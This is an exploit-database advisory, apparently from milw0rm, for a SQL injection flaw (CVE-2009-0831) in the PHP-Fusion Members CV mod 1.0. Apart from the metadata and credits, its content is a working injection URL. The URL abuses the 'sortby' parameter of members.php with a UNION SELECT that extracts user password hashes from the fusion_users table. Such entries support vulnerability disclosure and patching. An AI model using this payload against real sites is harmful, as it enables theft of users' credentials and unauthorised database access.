PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection
Author: Khashayar Fereidani
type: webapps
platform: php
port:
date_added: 2009-01-06
date_updated:
verified: 1
codes: OSVDB-51440;CVE-2009-0831
tags:
aliases:
screenshot_url:
application_url:
#####################################################################################
#### PHP-Fusion Mod Members Bewerb Sql Injection ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
# #
#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=204
# #
#Dork : :( #
# #
#####################################################################################
# [Bug] #
# #
#http://Site/[path]/members.php?sortby=%'%20union%20select%200,user_password,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20fusion_users/*
# #
#You must login then use bug . #
# #
#####################################################################################
# Site : Http://IRCRASH.COM #
###################################### TNX GOD ######################################
# milw0rm.com [2009-01-07]